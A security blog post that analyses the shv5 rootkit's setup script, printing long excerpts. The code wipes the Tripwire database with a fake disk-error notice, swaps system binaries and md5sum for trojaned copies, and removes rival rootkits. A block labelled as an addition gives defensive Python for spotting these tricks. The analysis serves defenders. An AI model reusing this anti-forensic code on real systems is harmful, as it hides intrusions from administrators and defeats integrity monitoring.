Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats

While reviewing some of the malware setup scripts I've collected through my honeypot, I came across the following code, which really caught my attention.  It is from the shv5 rootkit, which was released in 2010 and is detected by most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
echo "${RED} ALERT! tripwire database found ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
echo "-----------------------------------------" > $twd
echo "Tripwire segment-faulted !" >> $twd
echo "-----------------------------------------" >> $twd
echo "" >> $twd
echo "The reasons for this may be: " >> $twd
echo "" >> $twd
echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
echo "corrupted files while checking for possible change etc." >> $twd
echo ""
echo "pls. rerun tripwire to build the database again!" >> $twd
echo "" >> $twd
else
echo "${WHI} lucky you: Tripwire database not found. ${RES}"
fi
else
echo "${WHI} guess not. ${RES}"
fi

For those not familiar with it, Tripwire is designed to monitor system files for unauthorized tampering.

The above code, in all its simplistic glory, effectively negates any protection offered by Tripwire.  It does so by simply overwriting the Tripwire database with a text message that blames a disk error, so that the administrator is led to rebuild the database from scratch rather than investigate.

The same setup script later records the MD5 hashes of certain key system files before installing the malware:

# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

The setup then continues to back up the current system files and replace them with malware-infected copies:

# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat
chattr +isa /usr/sbin/netstat
fi

The md5sum tool itself is replaced with a custom copy, designed to return the original hash values recorded earlier:

# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

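One way a defender can catch both tricks, as an added example that is not from the post or the shv5 script: compute the digest in-process instead of trusting the host's md5sum binary, and refuse to rebuild a Tripwire database that has been overwritten with the script's text banner. The .shmd5 line format (md5sum's "hash  path") and the binary nature of a genuine .twd file are assumptions.

```python
"""Added example (not the post's or the shv5 script's code): cross-check recorded
MD5s with an in-process digest, and spot a Tripwire database overwritten with the
script's banner. Recorded hashes are assumed to be md5sum '<hex>  <path>' lines."""
import hashlib
import os
import tempfile

TWD_BANNER = b"Tripwire segment-faulted"   # text the setup script writes over $uname.twd

def independent_md5(path):
    """Digest computed by this process, so a trojaned /usr/bin/md5sum cannot shape it."""
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()

def parse_shmd5(text):
    """Parse md5sum output lines into {path: hex_digest}; malformed lines are ignored."""
    recorded = {}
    for line in text.splitlines():
        digest, sep, path = line.strip().partition("  ")
        if sep and len(digest) == 32:
            recorded[path] = digest.lower()
    return recorded

def find_mismatches(recorded):
    """Paths whose current on-disk digest differs from the recorded one."""
    return sorted(p for p, d in recorded.items()
                  if os.path.isfile(p) and independent_md5(p) != d)

def twd_looks_overwritten(path):
    """True if the file carries the banner or is all printable text (assumed: a real .twd is binary)."""
    with open(path, "rb") as f:
        head = f.read(4096)
    printable = bool(head) and all(32 <= b < 127 or b in b"\t\r\n" for b in head)
    return TWD_BANNER in head or printable

def demo():
    """Constructed scenario: record a hash, swap the file, plant the banner, run both checks."""
    with tempfile.TemporaryDirectory() as d:
        ps = os.path.join(d, "ps")
        with open(ps, "wb") as f:
            f.write(b"\x7fELF original ps")
        shmd5 = f"{independent_md5(ps)}  {ps}\n"   # what the script appends to .shmd5
        with open(ps, "wb") as f:
            f.write(b"\x7fELF replaced ps")         # the swapped-in binary
        twd = os.path.join(d, "host.twd")
        with open(twd, "wb") as f:
            f.write(b"-----\nTripwire segment-faulted !\n-----\n")
        return {"mismatches": find_mismatches(parse_shmd5(shmd5)),
                "twd_overwritten": twd_looks_overwritten(twd)}
```

Run the hasher from a trusted medium (a live CD or a statically linked copy) rather than from the host, since the script also replaces the binaries it records.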
Now that the attacker has a silent foothold on the system, the setup script goes on to check for potentially vulnerable services, and even for other rootkits:

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned
if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}"
fi
if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}"
fi

Make no mistake - today's attackers are smart.  They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers.

If you're interested in seeing more, you can view the full setup script at the CaffSec Malware Analysis Google Code site.
